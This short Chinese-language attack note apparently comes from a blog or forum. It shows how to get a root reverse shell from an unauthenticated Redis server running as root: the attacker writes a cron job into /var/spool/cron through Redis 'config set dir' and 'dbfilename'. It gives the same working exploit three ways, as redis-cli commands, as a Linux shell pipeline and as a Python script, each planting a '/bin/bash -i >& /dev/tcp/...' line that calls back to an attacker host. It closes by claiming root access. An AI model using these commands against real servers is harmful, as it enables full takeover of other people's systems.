前提:
1.redis由root用戶啟動。
2.開啟cron的時候,/var/spool/cron linux機器下默認的計划任務,linux會定時去執行里面的任務。
啟動服務 :/sbin/service crond start 或 /etc/init.d/crond start(centos系列) sudo /etc/init.d/cron start (ubuntu系列)
一.windows下
config set dir /var/spool/cron
config set dbfilename root
set 1 "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/10.1.1.1/1234 0>&1\n\n"
save
二.linux下
echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/10.1.1.1/1234 0>&1\n\n"|redis-cli -h 192.168.118.129 -x set 1
redis-cli -h 192.168.118.129 config set dir /var/spool/cron/
redis-cli -h 192.168.118.129 config set dbfilename root
redis-cli -h 192.168.118.129 save
三.再貼一段python代碼
import redis def shell_exploit(): try: r =redis.StrictRedis(host='192.168.118.129',port=6379,db=0,socket_timeout=10) r.set(1, '\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/your_ip/3333 0>&1\n\n') r.config_set('dir','/var/spool/cron') r.config_set('dbfilename','root') r.save() print "success!" except: print "fail!" pass shell_exploit()
反彈成功,root權限!